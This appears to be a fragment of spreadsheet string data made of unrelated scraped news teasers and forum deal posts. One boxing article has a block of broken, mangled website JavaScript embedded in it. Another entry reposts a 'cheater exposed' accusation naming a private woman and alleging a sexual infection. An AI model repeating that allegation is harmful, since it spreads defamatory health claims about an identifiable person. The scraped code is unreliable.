    <t>Serina Sandhu</t>
  </si>
  <si>
    <t>It is not clear if the money has been claimed by an individual, a couple or a syndicate The post EuroMillions results: UK winner comes forward to claim £170m National Lottery jackpot in Tuesday draw appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Lelisa Desisa became the first Ethiopian to win the title since Gezahegne Abera in 2001. Australia's Julian Spence finished 39th in a time of 2:19.40.</t>
  </si>
  <si>
    <t>Ridge Lenny during a firing swell at Fiji’s famed break; Swimming Pools. Footage: Tom Rawlins source The post Ridge Lenny surfing Swimming Pools, Fiji appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Australian rich-lister and ETF pioneer Graham Tuckwell reckons online challenger banks have the opportunity to give the big banks a run for their money.</t>
  </si>
  <si>
    <t>downforce</t>
  </si>
  <si>
    <t>Looking for a cheap burner phone and found this for $29 delivered. It's been this cheap before but on clearance now. Specs from Telstra Page … 5” Large Display 8MP Rear Camera with flash 5MP Front facing Camera with Flash Secure fingerprint scanner Fun Selfie Camera Features withface mask live filters and face show personalised video clips Quad-core processor Note the big note: Telstra will be switching off 3G in 2024. After switch off, you may not be able to access the Telstra Mobile Network from this device for calls, texts or data. Find out more</t>
  </si>
  <si>
    <t>By Stephany Nunneley, Tuesday, October 8, 2019 at 16:52 GMT Call of Duty: Modern Warfare will not be available for a few weeks, but the launch trailer is already available. Activision published the Call of Duty: Modern war launch the trailer a few weeks earlier. It's an action packed as you can imagine, with Metallica's Enter Sandman as a backing track. Well, we could all use some Metallica in our lives. The game will be released on October 25 and will include a one-player scenario centered on Captain Price and SAS collaborating with the CIA and Urzikstani Liberation Force to recover stolen chemical weapons. You will travel from London to the Middle East and other countries of the world, as this joint task force fights against "betrayals, moral dilemmas and winless situations to end a world war in large scale". In multiplayer, many modes are offered alongside 20v20, 32v32 and 50v50 ground warfare. According to the dataminers, there may be up to 40 modes available for the game at any given time, or even a royal battle. Modern Warfare will be available on PC, PlayStation 4 and Xbox One. Sometimes we include links to online stores. If you click on one and make a purchase, we could receive a small commission. For more information, go here.</t>
  </si>
  <si>
    <t>A teenager has admitted killing a motorcyclist by putting a hire bicycle in his path. Read more? Click here</t>
  </si>
  <si>
    <t>England flanker Tom Curry put in a Player of The Match performance against Australia — but is still wasn’t good enough to get a handshake from the Japanese woman presenting the prize.</t>
  </si>
  <si>
    <t>A technical recession occurs when there are two consecutive quarters of economic contraction.</t>
  </si>
  <si>
    <t>The chocolate brand looks to forge new Halloween traditions where trick-or-treating is frequently verboten. Read More</t>
  </si>
  <si>
    <t>NACRA 5.8 source The post NACRA 5 8 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>A day with the tradies of the Lost Arts at the Hawkesbury Showgrounds.</t>
  </si>
  <si>
    <t>The Best Apple Picking Spots You Can Visit This Fall – To make the most of your fall, here are the best apple picking spots you can visit in Ontario this fall! This lovely orchard. Find the Top Dentists in Halton Hills, ON Enter your location so we can match you with dentists near you Go Let us help you find the perfect dentist Go Best of 2019 – Dentists in Halton Hills, ON Best of 2019 – Dentists in Halton Hills, ON Here. Best Lodging in Halton Hills, Ontario (with Prices) Canada Ontario Halton Hills Halton Hills Hotels View map. A few of the most popular hotels near Terra Cotta Conservation Area are Best Western Halton Hills, Millcroft Inn &amp; Spa, and Days. Best Western Halton Hills, Days Inn by Wyndham Brampton, and Motel 6 Toronto Mississauga are some of the most popular hotels for travelers looking to stay near Silver Creek Conservation Area. See the full list: Hotels near Silver Creek Conservat. Best Dentists in Halton Hills, ON – Still Waters Dental Group, Dentistry On Sinclair, Downtown Georgetown Dental, Sunnyview Dental – Georgetown, King's Cove Family Dental, Pownall Janet, DDs – Still Waters Dental, Oksana M. Sawiak, DDS IMD. Best Western Halton Hills: My stay in Halton Hills bestwestern – See 173 traveler reviews, 14 candid photos, and great deals for Best Western Halton Hills at TripAdvisor. Most Popular Dentist In Halton Hills Ontario Oakville, Burlington and Milton most popular source for Daily Local Breaking News, Food, Top 5s, Business, and Entertainment. As fall approaches, the weather will start to get a bit chilly in Halton. You may think that the cold weather will. Find the Top Dentists in Halton Hills, ON Enter your location so we can match Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, Market Place Dental Centre, King's Cove Family Dental, Young Dentistry, Oksana M. Highest Rated Dental Clinic Near Halton Hills Ontario List of Amc – Free ebook download as Word Doc (.doc / .docx), PDF File (.pdf), Text File (.txt) or read book online for free. List of MAC Cosmetic Dentist Near Halton Hills Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Market Place Dental Centre, Pownall Janet, DDs Friendliest Dentist Near Halton Hills Ontario Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, Market Place Dental Centre, King's Cove Family Dental, Young Dentistry, Oksana M. Highest Rated Dental Clinic Near Halton Hills Ontario List of Amc – Free ebook download as Word Doc (.doc / .docx),</t>
  </si>
  <si>
    <t>Damien Ractliffe</t>
  </si>
  <si>
    <t>Kings Will Dream completed a stunning comeback from a near-death injury in last year’s Cox Plate to win Saturday’s group 1 Turnbull Stakes.</t>
  </si>
  <si>
    <t>Abrand44</t>
  </si>
  <si>
    <t>Crazy Pricing on cases of Coronita! Has to be an error, I'd get in quick before they notice!</t>
  </si>
  <si>
    <t>Click here to access in memoriam, death and birth notices on The Age tablet app.</t>
  </si>
  <si>
    <t>Not a bad bundle from Fanatical. The bundle has two tiers. The standout in tier 1 in my opinion is Magrunner. Tier 1: $1.65 AUD: Deployment Ninjin: Clash of Carrots Magrunner: Dark Pulse Super Panda Adventures Tier 2: $6.55 AUD: Dimension Drifter Robothorium: Cyberpunk Dungeon Crawler Omen Exitio: Plague Hamsterdam: Paws of Justice Black Paradox Degrees of Separation On Rusty Trails Archamon Enjoy!</t>
  </si>
  <si>
    <t>One of our most enjoyable tours during our trip to French Polynesia was a day we spent with Tupuna Mountain Safari Bora Bora . We snorkeled, enjoyed tropical fresh fruits and went on a boat ride around the lagoons. But the wildest part was the off-road ride on a rut-covered mud road to the top of […] The post Bora Bora Offroad Adventure appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Scientists have identified for the first time evidence of Andromeda, the closest galaxy to the Milky Way, cannibalising smaller galaxies on its way towards us.</t>
  </si>
  <si>
    <t>Flights bringing back the remaining 4,800 holidaymakers are due to take off on Sunday. The post Thomas Cook: Remaining 4,800 passengers set for return appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Express Sport columnist Jason Robinson believes the break Typhoon Hagibis has afforded England will be beneficial for Eddie Jones’ team. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>Allen Lazard and the Green Bay Packers improved to 5-1 Monday with a 23-22, come-from-behind win over Detroit. Source: Sports Business News</t>
  </si>
  <si>
    <t>Tom Cowie</t>
  </si>
  <si>
    <t>In proof that no musical dream is ever completely over, a band that existed for less than a year in Melbourne's early punk rock scene has reformed after four decades.</t>
  </si>
  <si>
    <t>U.S. stocks were on pace to open higher on Thursday, after Britain struck a preliminary last-minute deal with the European Union easing some geopolitical jitters, while upbeat earnings from Netflix and Morgan Stanley affirmed a strong start to the reporting season.</t>
  </si>
  <si>
    <t>I dated this girl for like one week and my p***s is on fire not in a good way she left me with clamidya and I’m itching like never before stay far away The post Angela Yurkiw – Abbotsford, BC appeared first on Expose Homewreckers. The post Angela Yurkiw – Abbotsford, BC appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>maddiempj</t>
  </si>
  <si>
    <t>The CMHC reports the seasonally adjusted annual rate decreased by 2.5% The post Housing starts slow in September appeared first on Advisor.</t>
  </si>
  <si>
    <t>By Stephany Nunneley, Thursday, October 3, 2019 at 20:02 GMT Ubisoft organized Monday in London an event called Keys To Learn. The purpose of the event was to highlight "the positive impact of games" on education, learning and more. Various representatives and representatives of BAFTA, UKIE, Video Games Without Borders, Radboud University's Games for Emotional and Mental Health Playground, UNESCO Education Sector and Creative Computing Club were presented. The also marked the launch of the BAFTA Young Games Designers Initiative for 2020. New educational tools were also presented, such as Coding of rabbits, a free game created to teach coding without instruction or supervision. The event also featured Discovery tour: Ancient Greece, free for all Assassin's Creed Odyssey owners or € 19.99 via Uplay. The Oikos project, a cooperative experience that teaches how much cooperation can be rewarding, and Game Creators' Odyssey, an online course that guides users through the game development process. The details on each are below. Coding of rabbits is a brand new free game created to be a fun and engaging educational experience, providing users with the tools they need to excite themselves to learn to code without the constant supervision or instructions of a teacher. Players are tasked with cleaning up a spaceship invaded by Rabbits, which can be done either by giving simple instructions to a Rabbit wearing a mental control device, or by dropping sausages into his field of vision. The game requires no prior knowledge of the coding; the instructions are simple and can be dragged from a menu, placed in order and tested with the play button. You have not achieved the desired results? Do not worry, just see where it went wrong, move some things and try again! You can get your hands on Rabbids Coding free from October 8; Go to Uplay and download it! If you're old enough to read, you're old enough to play Rabbids code. Ubisoft hopes to see the game taken up in classrooms and educational environments around the world. Oikos Project is a local cooperative gaming experience that shows players how cooperation can be much more rewarding and effective in times of crisis. In the Oikos project, players support a small ecosystem containing four species. The four species and the general state of health of the pond are all interdependent. As soon as a game session begins, the ecosystem begins to become unbalanced and players must work together to restore and maintain the pond balance. The Oikos project is an ambitious attempt to design a game to raise awareness of the challenges of the 21st century. Without lecture or guilt, the game encourages players to cooperate to keep the environment healthy throughout the game. This is achieved by using "biomimicry", or by imitating nature to affect the environment. results. For example, if an ecological system fails, all begin to do so, and the relationships between plants and animals in the environment have a direct effect on each other. We look forward to sharing the Oikos project with the world in the near future! Assets can be downloaded from this link. The Oikos project was developed by the strategic innovation laboratory of Ubisoft, a Paris-based internal team that anticipates future business developments, transcending the boundaries of the entertainment industry to detect technological trends, business revolutions and social changes. . Odyssey of game creators has also been announced. It is the result of a collaboration between Ubisoft and Concordia University in Montreal. Designed as a video game, Game Creators' Odyssey is an online course that guides students through the process of developing video games. The course is based on Ubisoft's know-how as one of the leaders in the gaming industry and offers a hands-on approach to game design that allows students to learn from the developer's point of view. games. Sometimes we include links to online stores. If you click on one and make a purchase, we could receive a small commission. For more information, go here.</t>
  </si>
  <si>
    <t>A Sydney woman’s bizarre peanut butter habit has outraged fans who claim she’s “destroying” the beloved spread.</t>
  </si>
  <si>
    <t>WATCH: Our latest update on the most significant weather impacting Australia.</t>
  </si>
  <si>
    <t>Before Japan Studio's Asobi team realized PlayStation VR's magical Astro Bot Rescue mission, they created the PS4 built-in software package, The Playroom. Designed as a social augmented reality experience, every console that comes with the game comes preinstalled, which means everyone has something to play immediately. It uses the new features of the DualShock 4, such as the touchpad and the lightbar, as an early introduction to the new features of the PS4. After reading PS5's latest news bulletin on PS5, we can deduce that the team is bringing The Playroom back to the next generation console. Peter Rubin spoke about the new controller's haptic feedback on "a series of short demos, courtesy of the same team from Japan Studio who designed PlayStation VR's Astro Bot Rescue Mission." He talks about the ability for a character to travel through a series of different surfaces, all offering unique sensations through the controller's new rumble technology. It is quite possible that this is part of a potential game room 2. If this is really the case, the PS5 will present it as a baked experience that will take full advantage of all the new features. We know that the development team is more than capable of providing fun touch gameplay. So we are really interested in what is preparing for PS5. Would you like to see The Playroom 2 on PS5? Do you like integrated experiences like this? Play well in the comments below. .</t>
  </si>
  <si>
    <t>From New York to Havana, this iconic era of design has a special place in cities – and hearts, and no more so than in Sydney.</t>
  </si>
  <si>
    <t>Chief Judge Kevin Sleight said the girl had experienced “anxiety and apprehension” knowing her attacker was still at large after the 2017 incident in Mount Lawley.</t>
  </si>
  <si>
    <t>Like the Daniher name, the mo is a direct link to a simpler time in football.</t>
  </si>
  <si>
    <t>Acosta could be the biggest douche on CNN, and that’s not easy. Play Video MULVANEY: “Elections do have consequences and they should. Your foreign policy is going to change. Obama did it in one way and we’re doing it a different way and there’s no problem with that.” ACOSTA: “What about the Bidens though, Mr. […]</t>
  </si>
  <si>
    <t>Is the federal government's anger at the big banks disingenuous or will its new inquiry actually achieve real results for customers?</t>
  </si>
  <si>
    <t>Before the full unveiling of the PlayStation 5 and its release in 2020, Sony is clearly behind the scenes. The company has been in the process of restructuring for some time now, with former PlayStation Europe president Jim Ryan, who was Sony Interactive Entertainment's CEO in February, and much more recently Sony Worldwide's departure. Studios, Chariman, Shawn Layden. has been announced. The plans are moving, as they say. Unfortunately, corporate restructurings often have an unfortunate advantage in that specific teams or divisions can be reduced, shuffled or deleted altogether. According to information provided by VGC, this is what happened to Sony Interactive Entertainment Europe: "dozens" of employees were fired earlier this week. According to sources in the publication, directors of Sony Interactive Entertainment America would have arrived in London the same day the new details of the PlayStation 5 would have been made public, revealing the restructuring plans of the organization. The VGC article suggests that the timing was not intentional, but that it remains quite difficult. This generation, Sony has strived to establish the spearhead of its operations in the United States, unlike the three key regions of society (North America, Europe and Japan) acting independently to some extent. It will be interesting to see the impact of all this restructuring when we enter the next generation of consoles. Naturally, all of us here at Push Square send our best wishes to those who find themselves unemployed. .</t>
  </si>
  <si>
    <t>Andy Ruiz Jr’s concerns about Anthony Joshua rematch are just good old boxing politics – Barry McGuigan Original Source Saudi Arabia is an unusual place from the point of view of boxing culture. There is no history of prize fighting in the region and you feel that absence from the moment you touch down. From a technical point of view everything works. The facilities and the hotels are great. The only thing that went against us when George Groves fought Callum Smith was the result, but we had no complaints about the show. So whatever concerns Andy Ruiz has about the rematch, it is not the setting or neutrality. You will never find a more neutral location to defend a title. I suspect good old boxing politics is behind the Ruiz noise coming out of the United States. His handlers are either manipulating the circumstances for a better deal, or they are testing the strength of the contract. Ruiz Jr lands a right hook on Joshua in his win back in June (Image: Getty Images) Read More Ruiz is managed by Al Haymon, who also advises Deontay Wilder. And Haymon wants the big fights in the US, an environment he knows and can control. In many ways Joshua walked into an ambush in the first fight at Madison Square Garden. He was reckless. He got caught trying to finish the job and the whole fight went away from him. To me, Joshua didn’t look quite right at any point that night. There was speculation that he was hurt in his last sparring session. He looked unsettled. Ruiz Jr celebrates his victory over Joshua in New York (Image: Action Images via Reuters) Critics say he is no good away from home. I don’t believe that. People forget how difficult it is to maintain form when you are carrying the weight of the sport on your shoulders. That is how it must seem to him at times. Joshua has become a huge star. After being knocked down four times in New York, Joshua recognised something has to give and has said he will make changes to his coaching team. He said he needs to get back to basics, to surround himself by boxing people and rediscover his passion for the sport. In that Joshua is absolutely bang on. Wherever the rematch takes place, he needs to be fully focused on the job. He can’t afford to get careless a second time. Follow Barry on Twitter at @ClonesCyclone @McGuigans_Gym @CyclonePromo !function()return function e(t,n,r)function o(i,c)if(!n[i])if(!t[i])var u=”function”==typeof require&amp;&amp;require;if(!c&amp;&amp;u)return u(i,!0);if(a)return a(i,!0);var s=new Error(“Cannot find module ‘”+i+”‘”);throw s.code=”MODULE_NOT_FOUND”,svar f=n[i]=exports:;t[i][0].call(f.exports,function(e)return o(t[i][1][e],f,f.exports,e,t,n,r)return n[i].exportsfor(var a=”function”==typeof require&amp;&amp;require,i=0;i”===n.substr(0,1)?function(t,n,r)var o=e(n.querySelectorAll(r.substr(1)));return o=o.filter(function(e)return e.parentNode===n),t.concat(o)(i,t,n):function(t,n,r)return t.concat(e(n.querySelectorAll(r)))(i,t,n)),function e(t,n,r,o,a,i)if(n!==r)var c=o.indexOf(n);-1!==c&amp;&amp;(a.call(o[c],t),i.preventDefault&amp;&amp;t.preventDefault()),e(t,n.parentNode,r,o,a,i)else i.stopPropagation&amp;&amp;t.stopPropagation()(r,r.target,t,i,o,a)))}(),domReady:function(e)”loaded”===document.readyState?(r(document,t),r(window,”load”)):”interactive”===document.readyState&amp;&amp;r(document,t),document.addEventListener?n(document,t,e):n(window,”load”,e),fire:function(e,t,n),listen:n}}();n.default=r},],2:[function(e,t,n)”use strict”;function r(e,t)var n=e[0],r=e[1],o=e[2],s=e[3];r=u(r=u(r=u(r=u(r=c(r=c(r=c(r=c(r=i(r=i(r=i(r=i(r=a(r=a(r=a(r=a(r,o=a(o,s=a(s,n=a(n,r,o,s,t[0],7,-680876936),r,o,t[1],12,-389564586),n,r,t[2],17,606105819),s,n,t[3],22,-1044525330),o=a(o,s=a(s,n=a(n,r,o,s,t[4],7,-176418897),r,o,t[5],12,1200080426),n,r,t[6],17,-1473231341),s,n,t[7],22,-45705983),o=a(o,s=a(s,n=a(n,r,o,s,t[8],7,1770035416),r,o,t[9],12,-1958414417),n,r,t[10],17,-42063),s,n,t[11],22,-1990404162),o=a(o,s=a(s,n=a(n,r,o,s,t[12],7,1804603682),r,o,t[13],12,-40341101),n,r,t[14],17,-1502002290),s,n,t[15],22,1236535329),o=i(o,s=i(s,n=i(n,r,o,s,t[1],5,-165796510),r,o,t[6],9,-1069501632),n,r,t[11],14,643717713),s,n,t[0],20,-373897302),o=i(o,s=i(s,n=i(n,r,o,s,t[5],5,-701558691),r,o,t[10],9,38016083),n,r,t[15],14,-660478335),s,n,t[4],20,-405537848),o=i(o,s=i(s,n=i(n,r,o,s,t[9],5,568446438),r,o,t[14],9,-1019803690),n,r,t[3],14,-187363961),s,n,t[8],20,1163531501),o=i(o,s=i(s,n=i(n,r,o,s,t[13],5,-1444681467),r,o,t[2],9,-51403784),n,r,t[7],14,1735328473),s,n,t[12],20,-1926607734),o=c(o,s=c(s,n=c(n,r,o,s,t[5],4,-378558),r,o,t[8],11,-2022574463),n,r,t[11],16,1839030562),s,n,t[14],23,-35309556),o=c(o,s=c(s,n=c(n,r,o,s,t[1],4,-1530992060),r,o,t[4],11,1272893353),n,r,t[7],16,-155497632),s,n,t[10],23,-1094730640),o=c(o,s=c(s,n=c(n,r,o,s,t[13],4,681279174),r,o,t[0],11,-358537222),n,r,t[3],16,-722521979),s,n,t[6],23,76029189),o=c(o,s=c(s,n=c(n,r,o,s,t[9],4,-640364487),r,o,t[12],11,-421815835),n,r,t[15],16,530742520),s,n,t[2],23,-995338651),o=u(o,s=u(s,n=u(n,r,o,s,t[0],6,-198630844),r,o,t[7],10,1126891415),n,r,t[14],15,-1416354905),s,n,t[5],21,-57434055),o=u(o,s=u(s,n=u(n,r,o,s,t[12],6,1700485571),r,o,t[3],10,-1894986606),n,r,t[10],15,-1051523),s,n,t[1],21,-2054922799),o=u(o,s=u(s,n=u(n,r,o,s,t[8],6,1873313359),r,o,t[15],10,-30611744),n,r,t[6],15,-1560198380),s,n,t[13],21,1309151649),o=u(o,s=u(s,n=u(n,r,o,s,t[4],6,-145523070),r,o,t[11],10,-1120210379),n,r,t[2],15,718787259),s,n,t[9],21,-343485551),e[0]=d(n,e[0]),e[1]=d(r,e[1]),e[2]=d(o,e[2]),e[3]=d(s,e[3])function o(e,t,n,r,o,a)t&gt;&gt;&gt;32-o,n)function a(e,t,n,r,a,i,c)~t&amp;r,e,t,a,i,c)function i(e,t,n,r,a,i,c)n&amp;~r,e,t,a,i,c)function c(e,t,n,r,a,i,c)return o(t^n^r,e,t,a,i,c)function u(e,t,n,r,a,i,c)~r),e,t,a,i,c)function s(e)var t,n=[];for(t=0;t&gt;2]=e.charCodeAt(t)+(e.charCodeAt(t+1)&lt;&lt;8)+(e.charCodeAt(t+2)&lt;&lt;16)+(e.charCodeAt(t+3)&lt;&lt;24);return nObject.defineProperty(n,"__esModule",value:!0);var f="0123456789abcdef".split("");function l(e)for(var t="",n=0;n&gt;8*n+4&amp;15]+f[e&gt;&gt;8*n&amp;15];return tfunction d(e,t)return e+t&amp;4294967295n.default=function(e)return function(e)for(var t=0;t2](e)),],3:[function(e,t,n);i.PWA&amp;&amp;(0,a.default)(i.PWA),9:9],4:[function(e,t,n)”use strict”;Object.defineProperty(n,”__esModule”,value:!0),n.deleteCaches=n.response=void 0;var r,o=e(10),a=e(2),i=(r=a)&amp;&amp;r.__esModule?r:default:r;var c=”offline/”,u=2e3,s=[name:”gpt”,pattern:function(e)return”https://www.googletagservices.com/tag/js/gpt.js”===e,name:”permutive”,pattern:function(e)return”https://d3alqb8vzo7fun.cloudfront.net/8a2c2f13-f564-4fff-8d22-177534028b95-1.0.js”===e,name:”weather.com”,pattern:function(e)return e.startsWith(“https://widgets-stage.weather.com/”),name:”gigya”,pattern:function(e)return e.startsWith(“https://cdns.gigya.com/JS/gigya.js”),name:”facebook”,pattern:function(e)return”https://connect.facebook.net/en_US/sdk.js”===e,name:”onscroll”,pattern:function(e)return e.match(/tags.onscroll.com.*/)];function f(e)e.modal&amp;&amp;e.removeChild(e.modal),delete e.modal,clearTimeout(e.modalTimeout),e.classList.remove(“skeleton”)n.default=function(e)var t=(arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:).modalTimeout,n=arguments[2].clog,r=window.localStorage.getItem(o.HASH_KEY),a=window.localStorage.getItem(o.DATE_KEY),i=new Promise(function(i,c)u),caches.open(o.CACHE_KEY).then(function(e)e.match(location.href).then(function(e)if(e)var t=e.headers.get(o.HASH_PREFIX),n=e.headers.get(“date”);e.text().then(function(e)r!==t&amp;&amp;Date(n)&gt;Date(a)&amp;&amp;i(content:e,contentHash:t,status:”networkCacheUpdate”,date:n)))),navigator.serviceWorker.addEventListener(“message”,function(e)if(e.origin===location.origin)var t=e.data;if(t&amp;&amp;”NEW_VERSION”===t.message&amp;&amp;t.url===location.href)n(“Updating from sw message”),n(“NETWORK UPDATE”);var r=content:t.content,contentHash:t.contentHash,status:”networkUpdate”,date:t.date;i(r)));return i.then(function(t)n(“GETDATA RESOLVED”),function(e,t)if(window.localStorage.getItem(o.HASH_KEY)!==t.contentHash)var n=document.implementation.createHTMLDocument(“temp”);n.documentElement.innerHTML=t.content,e.parentNode.replaceChild(n.querySelector(“main”),e),f(e);var r=document.createEvent(“HTMLEvents”);r.initEvent(“component.activate”,!0,!0),r.data=,document.querySelector(“main”).dispatchEvent(r),window.localStorage.setItem(o.HASH_KEY,t.contentHash),window.localStorage.setItem(o.DATE_KEY,t.date)else f(e)(e,t),n(t.status)).catch(function(e)n(“GETDATA REJECTED”),n(“Error getting data: “+e)),i,n.response=function(e,t)var n=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]?arguments[2]:”/”,r=arguments[3],a=(arguments.length&gt;4&amp;&amp;void 0!==arguments[4]?arguments[4]:).debug,u=e.request.url,f=function();a&amp;&amp;(f=function(e)console.log(“[TM PWA] “+e));for(var l=u.match(///.+?//)[0].includes(t),d=l&amp;&amp;!u.includes(“service-worker.js”),g=0,h=s.length;!d&amp;&amp;g2&amp;&amp;void 0!==arguments[2]?arguments[2]:”readonly”;return new Promise(function(o,a)var i=e.open(“marwood-pwa”,1);i.onupgradeneeded=function()r.forEach(function(e)i.result.createObjectStore(e.name,keyPath:e.key)),i.onsuccess=function()if(i.result.onversionchange=function(e)===e.newVersion&amp;&amp;e.target.close(),i&amp;&amp;i.result&amp;&amp;i.result.objectStoreNames.contains(t))var e=i.result.transaction(t,n).objectStore(t);if(e)return void o(e)a()),],7:[function(e,t,n){“use strict”;Object.defineProperty(n,”__esModule”,value:!0);var r=”marwood-af05a279f9537a620349bcf36d4180b4″,o=”offline/”;function a(e)caches.open(r).then(function(t)document.querySelectorAll(‘meta[name=”cache-preload”]’).forEach(function(e)var n=e.getAttribute(“content”);t.match(n).then(function(e)));var n=e+o;t.match(n).then(function(e)fetch(n).then(function(e)if(e.redirected)var r=e.clone(),o=status:r.status,statusText:r.statusText,headers:;e.headers.forEach(function(e,t)o.headers[t]=e),r.text().then(function(e)t.put(n,new Response(e,o)))else t.put(n,e))))n.default=function()(t=”.teaser”),window.addEventListener(“load”,function()[];(function(e,t)var n=e.endpoint,r=e.selector;if(n)return new Promise(function(e)fetch(n+”?url=”+location.href.split(“?”)[0]).then(function(n)n.json().then(function(n)e(n.filter(function(e)return e.url&amp;&amp;e.url.length&gt;0).slice(0,t).map(function(e)returnurl:e.url,text:e.title,image:e.image.href.replace(“/BINARY/”,”/alternates/s615b/”),tag:e.tags&amp;&amp;e.tags[0])))));if(r)var o=Array.from(document.querySelectorAll(r)).slice(0,t);return Promise.resolve(o.map(function(e)var t=e.querySelector(“a.headline”),n=e.querySelector(“img”),r=e.querySelector(“a.label”);returnn.getAttribute(“src”),tag:r&amp;&amp;r.innerHTML)))(endpoint:i,selector:t,n).then(function(t)var o=t;e.length&amp;&amp;(o=t.filter(function(t)return e.find(function(e)return t.url!==e.url))),o.length&amp;&amp;caches.open(r).then(function(t)o.forEach(function(r)r.text&amp;&amp;r.url&amp;&amp;r.image&amp;&amp;t.addAll([r.url,r.image]).then(function()e.find(function(e)return e.url===r.url)))))))},],8:[function(e,t,n)”use strict”;Object.defineProperty(n,”__esModule”,value:!0),n.track=function(e,t)(0,a.default)(e,i,”readwrite”).then(function(e)e.put(url:t,timestamp:(new Date).getTime())),n.offlineLandingTracking=function()var e=localStorage.getItem(c);return localStorage.removeItem(c),e,n.trackOfflineLanding=function()localStorage.setItem(c,Number(localStorage.getItem(c);var r,o=e(6),a=(r=o)&amp;&amp;r.__esModule?r:default:r;var i=”pageviews”,c=”offlineLandingPageViews”;n.default=function(e,t)(0,a.default)(e,i,”readwrite”).then(function(e)var n=e.count();n.onsuccess=function()var r=n.result-1;r&gt;0&amp;&amp;t(r),e.clear()),6:6],9:[function(e,t,n)iPod/i);function d(e,t)var n=t.clog;i.default.fire(window,”contentupdate”,e),n(“CONTENTUPDATE: “+e)function g(e)var t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:1;i.default.fire(window,”analytics.track”,name:e,category:”metrics”,value:t)function h(e,t,n)var r=n.clog,o=window.localStorage.getItem(s.HASH_KEY);(0,a.default)(e,t.cacheFirst,clog:r).then(function(e)d(o===e.contentHash?”unchanged”:”fresh”,clog:r),g(“cacheFirstPageView”)).catch(function()d(“cached”,clog:r),g(“cacheFirstPageView”),r(“CACHED PAGE VIEW”),navigator.serviceWorker.addEventListener(“message”,function(e)if(e.origin===location.origin)var t=e.data;t&amp;&amp;”NEW_VERSION”===t.message&amp;&amp;t.url===location.href&amp;&amp;(o!==t.contentHash?(g(“stalePageView”),r(“STALE PAGE VIEW”)):(g(“cachedPageView”),r(“MOULDY PAGE VIEW”)))))function v()var e=arguments.length&gt;0&amp;&amp;void 0!==arguments[0]?arguments[0]:””,t=document.querySelector(“link[rel=manifest]”);if(t)var n=t.href;return new Promise(function(t,r)caches.open(s.MANIFEST_CACHE_NAME+”:”+e).then(function(e)e.match(n).then(function(r)r?t(r):fetch(n).then(function(r)e.put(n,r.clone()),t(r.clone())))).catch(function(e)return r(e))).then(function(e)return e.json().then(function(e)return e))n.default=function(e)var t=function();if(“serviceWorker”in navigator)else d(“none”,clog:t),n.analytics=g,n.getManifest=v,n.cookie=function(e,t)var n=arguments.length&gt;2&amp;&amp;void 0!==arguments[2]?arguments[2]:2,r=new Date;r.setTime(r.getTime()+24*n*60*60*1e3),document.cookie=e+”=”+t+”;expires=”+r.toUTCString()+”;path=/”,n.urlBase64ToUint8Array=s.urlBase64ToUint8Array,n.validate=function(e)var t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:””;if(!e)returnhomepage:t;var n=void 0;tryn=JSON.parse(document.getElementById(“manifest-validation”).getAttribute(“content”))catch(e)return var r=e.filter(function(e)return n.url&amp;&amp;n.url.includes(e.homepage)),o=e.filter(function(e)return n.primaryTag&amp;&amp;n.primaryTag===e.tag),a=e.filter(function(e)return n.tags&amp;&amp;n.tags.includes(e.tag));if(1===r.length)return r[0];if(1===o.length)return o[0];if(1===a.length)return a[0];var i=e.filter(function(e)return e.scope===t);return i?i[0]:void 0,n.MANIFEST_CACHE_NAME=s.MANIFEST_CACHE_NAME,1:1,10:10,4:4,5:5,7:7,8:8],10:[function(e,t,n).*.amp)/g,o=”TM-Hash-“+location.href,a=”TM-Date-“+location.href;n.CACHE_KEY=”marwood-af05a279f9537a620349bcf36d4180b4″,n.CACHE_NAME=”marwood”,n.MANIFEST_CACHE_NAME=”manifestCache”,n.urlBase64ToUint8Array=function(e)for(var t=(e+”=”.repeat((4-e.length%4)%4)).replace(/-/g,”+”).replace(/_/g,”/”),n=atob(t),r=new Uint8Array(n.length),o=0;o //# sourceMappingURL=pwa.min.js.map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Andy Ruiz Jr’s concerns about Anthony Joshua rematch are just good old boxing politics – Barry McGuigan appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>The latest murder case against notorious Victorian killer Peter Norris Dupas has been dropped.</t>
  </si>
  <si>
    <t>Review finds higher than expected claim decline rates, restrictive definitions and "frictions" in claims handling processes</t>
  </si>
  <si>
    <t>PARKINSON’S disease is a progressive nervous system disorder that affects movement. Symptoms tend to be gradual in the disease, sometimes starting with a barely noticeable tremor in just one hand. Experiencing a loss of this sensation could mean you are at risk. What is it? Daily Express :: Health Feed</t>
  </si>
  <si>
    <t>Labor says international bodies "don't dictate to Australia" and accused the Prime Minister of adopting Trump-style rhetoric.</t>
  </si>
  <si>
    <t>Married at First Sight’s Jules Robinson refuses to conform to unhealthy weight standards as she continues her weight loss journey ahead of her big day.</t>
  </si>
  <si>
    <t>A Queensland council will take steps to conceal a sculpture called Birth of Venus outside its arts centre after a local complained about its "very distasteful pose".</t>
  </si>
  <si>
    <t>Work is under way on a new nursery in Dundee which will cater for more than 170 children from next year.</t>
  </si>
  <si>
    <t>All the latest Newcastle United updates on Sunday, October 13 This post written by Chris Knight originally appeared on ChronicleLive - Newcastle United FC. Read the full post here. Source</t>
  </si>
  <si>
